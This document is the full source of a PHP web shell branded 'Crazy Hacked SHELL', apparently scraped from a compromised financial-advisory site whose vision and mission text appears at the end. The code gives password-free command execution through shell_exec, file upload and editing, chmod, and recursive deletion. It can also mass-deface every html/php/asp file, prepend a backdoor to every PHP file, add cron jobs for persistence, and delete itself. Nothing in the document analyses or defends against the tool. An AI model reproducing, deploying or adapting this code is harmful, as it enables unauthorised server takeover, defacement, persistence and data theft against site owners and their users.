error_reporting(0);
set_time_limit(0);
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
$path = realpath($path);
if (isset($_FILES['file'])) {
if (move_uploaded_file($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "
✅ File diupload: " . htmlspecialchars($_FILES['file']['name']) . "
";
} else {
}
}
if (isset($_POST['bypass_upload'])) {
$target_dir = $path . "/";
$target_file = $target_dir . basename($_POST['new_filename']);
if (move_uploaded_file($_FILES["bypass_file"]["tmp_name"], $target_file)) {
echo "
✅ Upload & Rename: " . htmlspecialchars($_POST['new_filename']) . "
";
} else {
}
}
if (isset($_POST['save_edit'])) {
$file = $path . '/' . $_POST['edit_file'];
file_put_contents($file, $_POST['content']);
}
if (isset($_POST['do_rename'])) {
$old = $path . '/' . $_POST['old_name'];
$new = $path . '/' . $_POST['new_name'];
if (rename($old, $new)) {
echo "
✅ Direname menjadi: " . htmlspecialchars($_POST['new_name']) . "
";
} else {
}
}
// HAPUS FILE SATU-SATU
if (isset($_GET['delete'])) {
$file = $path . '/' . $_GET['delete'];
if (file_exists($file)) {
if (is_dir($file)) {
// Hapus folder kosong saja (biar aman)
if (count(scandir($file)) <= 2) {
rmdir($file);
echo "
✅ Folder dihapus: " . htmlspecialchars($_GET['delete']) . "
";
} else {
echo "
❌ Folder tidak kosong! Hapus file didalamnya dulu.
";
}
} else {
unlink($file);
echo "
✅ File dihapus: " . htmlspecialchars($_GET['delete']) . "
";
}
}
}
// HAPUS FOLDER BESERTA ISI (TAPI PERLU KONFIRMASI MANUAL)
if (isset($_GET['delete_folder'])) {
$folder_to_delete = $path . '/' . $_GET['delete_folder'];
if (is_dir($folder_to_delete)) {
echo "
";
echo "
⚠️ KONFIRMASI HAPUS FOLDER
"; echo "
Anda akan menghapus folder: " . htmlspecialchars($_GET['delete_folder']) . "
";
$files_in_folder = array_diff(scandir($folder_to_delete), array('.', '..'));
foreach ($files_in_folder as $item) {
$item_path = $folder_to_delete . '/' . $item;
echo "
" . htmlspecialchars($item) . " (" . (is_dir($item_path) ? "Folder" : "File") . ")"; }
echo "";
echo "
echo "";
echo "";
echo "";
echo "";
echo "
";
}
}
if (isset($_POST['execute_delete_folder'])) {
$folder_to_delete = $path . '/' . $_POST['confirm_delete_folder'];
function deleteFolderRecursive($dir) {
if (!is_dir($dir)) return false;
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file) {
$path = $dir . '/' . $file;
if (is_dir($path)) {
deleteFolderRecursive($path);
} else {
unlink($path);
}
}
return rmdir($dir);
}
if (deleteFolderRecursive($folder_to_delete)) {
echo "
✅ FOLDER DIHAPUS: " . htmlspecialchars($_POST['confirm_delete_folder']) . " - Semua konten telah dihapus!
";
} else {
echo "
❌ Gagal menghapus folder!
";
}
}
if (isset($_POST['do_chmod'])) {
$file = $path . '/' . $_POST['chmod_file'];
$perm = octdec($_POST['new_perm']);
if (chmod($file, $perm)) {
echo "
✅ CHMOD diubah menjadi: " . $_POST['new_perm'] . "
";
} else {
}
}
if (isset($_POST['mass_deface'])) {
$deface_code = $_POST['deface_code'];
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path));
foreach ($files as $file) {
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
if (in_array($ext, ['html', 'php', 'asp'])) {
file_put_contents($file, $deface_code);
echo "
✅ Dideface: " . htmlspecialchars($file) . "
";
}
}
}
if (isset($_POST['inject_backdoor'])) {
$backdoor = $_POST['backdoor_code'];
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path));
foreach ($files as $file) {
if (strtolower(pathinfo($file, PATHINFO_EXTENSION)) == 'php') {
$content = file_get_contents($file);
if (strpos($content, $backdoor) === false) {
file_put_contents($file, $backdoor . "n" . $content);
echo "
✅ Diinjeksi: " . htmlspecialchars($file) . "
";
}
}
}
}
if (isset($_POST['zip_download'])) {
$zip_dir = $_POST['zip_dir'];
$zip_file = tempnam(sys_get_temp_dir(), 'zip_') . '.zip';
$zip = new ZipArchive();
if ($zip->open($zip_file, ZipArchive::CREATE) === true) {
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($zip_dir));
foreach ($files as $file) {
if (!$file->isDir()) {
$zip->addFile($file, str_replace($zip_dir . '/', '', $file));
}
}
$zip->close();
}
}
if (isset($_POST['add_cronjob'])) {
$cronjob = $_POST['cronjob'];
file_put_contents('/tmp/cronjob.txt', $cronjob);
shell_exec("crontab /tmp/cronjob.txt");
echo "
✅ Cronjob ditambahkan!
";
}
if (isset($_POST['self_destruct'])) {
unlink(__FILE__);
echo "
💥 Shell dihapus! Selamat tinggal...
";
exit;
}
?>
Crazy Hacked
/* CSS SAMA SEPERTI SEBELUMNYA */
:root {
--primary: #00b894;
--secondary: #008f7a;
--bg: rgba(18, 18, 18, 0.85);
--text: #dfe6e9;
--highlight: #e17055;
--file: #b2bec3;
--dir: #0984e3;
--danger: #d63031;
--success: #00b894;
}
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Consolas', 'Courier New', monospace;
}
body {
background: url('https://j.top4top.io/p_36030tmji1.jpg') no-repeat center center fixed !important;
background-size: cover !important;
color: var(--text);
min-height: 100vh;
overflow-x: hidden;
}
.container {
width: 95%;
max-width: 1200px;
margin: 20px auto;
padding: 20px;
background: var(--bg);
border: 1px solid var(--secondary);
border-radius: 10px;
box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);
}
h1, h2, h3 {
color: var(--highlight);
margin-bottom: 15px;
}
h1 {
text-align: center;
font-size: 2.5em;
text-shadow: 0 0 5px rgba(0, 0, 0, 0.5);
}
.tabs {
display: flex;
flex-wrap: wrap;
gap: 5px;
margin: 15px 0;
justify-content: center;
}
.tab-button {
padding: 8px 15px;
background: rgba(0, 0, 0, 0.5);
color: var(--primary);
border: 1px solid var(--secondary);
border-radius: 5px;
cursor: pointer;
transition: all 0.3s;
}
.tab-button:hover {
background: var(--secondary);
color: var(--text);
transform: scale(1.05);
}
.tab {
display: none;
padding: 15px;
background: rgba(0, 0, 0, 0.5);
border: 1px solid var(--secondary);
border-radius: 5px;
animation: fadeIn 0.5s;
}
@keyframes fadeIn {
from { opacity: 0; }
to { opacity: 1; }
}
.tab.active {
display: block;
}
pre {
background: rgba(0, 0, 0, 0.5);
padding: 15px;
border: 1px solid var(--secondary);
border-radius: 5px;
overflow-x: auto;
max-height: 400px;
color: var(--text);
}
input, select, textarea, button {
background: rgba(0, 0, 0, 0.5);
color: var(--text);
border: 1px solid var(--secondary);
padding: 8px;
border-radius: 5px;
margin: 5px 0;
width: 100%;
}
button {
cursor: pointer;
transition: all 0.3s;
}
button:hover {
background: var(--secondary);
color: var(--text);
}
a {
color: var(--primary);
text-decoration: none;
transition: color 0.3s;
}
a:hover {
color: var(--highlight);
text-decoration: underline;
}
.file-list {
background: rgba(0, 0, 0, 0.4);
padding: 10px;
border: 1px solid var(--secondary);
border-radius: 5px;
max-height: 300px;
overflow-y: auto;
}
.file-item {
padding: 5px;
border-bottom: 1px solid var(--secondary);
display: flex;
justify-content: space-between;
color: var(--file);
}
.file-item:hover {
background: rgba(0, 184, 148, 0.2);
}
.file-item a {
color: var(--file);
text-decoration: none;
}
.file-item a[href*="?path="] {
color: var(--dir);
font-weight: bold;
}
.terminal-output {
font-family: monospace;
white-space: pre-wrap;
word-wrap: break-word;
color: var(--text);
}
.path-nav {
display: flex;
gap: 10px;
margin-bottom: 10px;
}
.path-nav input {
width: 70%;
}
.bypass-upload {
margin: 10px 0;
padding: 10px;
background: rgba(0, 0, 0, 0.5);
border: 1px solid var(--secondary);
border-radius: 5px;
}
.bypass-upload input {
margin-right: 10px;
}
@media (max-width: 768px) {
.container {
width: 98%;
padding: 10px;
}
.tabs {
flex-direction: column;
}
.tab-button {
width: 100%;
}
}
Crazy Hacked SHELL
No Password | Full Access | Bypass WAF/503/500
🔄 Bypass Upload
📁 File Manager
Current Path: = htmlspecialchars($path) ?>
$files = scandir($path);
foreach ($files as $file) {
if ($file == ".") continue;
$file_path = $path . '/' . $file;
$is_dir = is_dir($file_path);
echo "
";
echo $is_dir ? "📂 " . htmlspecialchars($file) : "📄 " . htmlspecialchars($file);
echo "";
echo "
";
if (!$is_dir) {
} else {
}
echo "
";
echo "
";
}
?>
if (isset($_GET['view'])) {
$file = $path . '/' . $_GET['view'];
if (file_exists($file)) {
echo "
📄 Viewing: " . htmlspecialchars($_GET['view']) . "
"; echo "
" . htmlspecialchars(file_get_contents($file)) . "
";
}
}
if (isset($_GET['edit'])) {
$file = $path . '/' . $_GET['edit'];
if (file_exists($file)) {
echo "
✏️ Editing: " . htmlspecialchars($_GET['edit']) . "
"; echo "
echo "";
echo "";
echo "";
echo "";
}
}
if (isset($_GET['rename'])) {
$file = $path . '/' . $_GET['rename'];
if (file_exists($file)) {
echo "
🔄 Rename: " . htmlspecialchars($_GET['rename']) . "
"; echo "
echo "";
echo "";
echo "";
echo "";
}
}
if (isset($_GET['chmod'])) {
$file = $path . '/' . $_GET['chmod'];
if (file_exists($file)) {
echo "
🔐 CHMOD: " . htmlspecialchars($_GET['chmod']) . "
"; echo "
echo "";
echo "";
echo "";
echo "";
}
}
?>
💻 Terminal
if (isset($_POST['cmd'])) {
echo "
📤 Output:
"; echo "
" . htmlspecialchars(shell_exec($_POST['cmd'])) . "
";
}
?>
Vision
To be the most empowering and accessible financial partner, guiding individuals and families towards a lifetime of financial well-being.
Mission Statement
Empower individuals and families to achieve their financial goals through Education, Planning, and Collaborative Trust.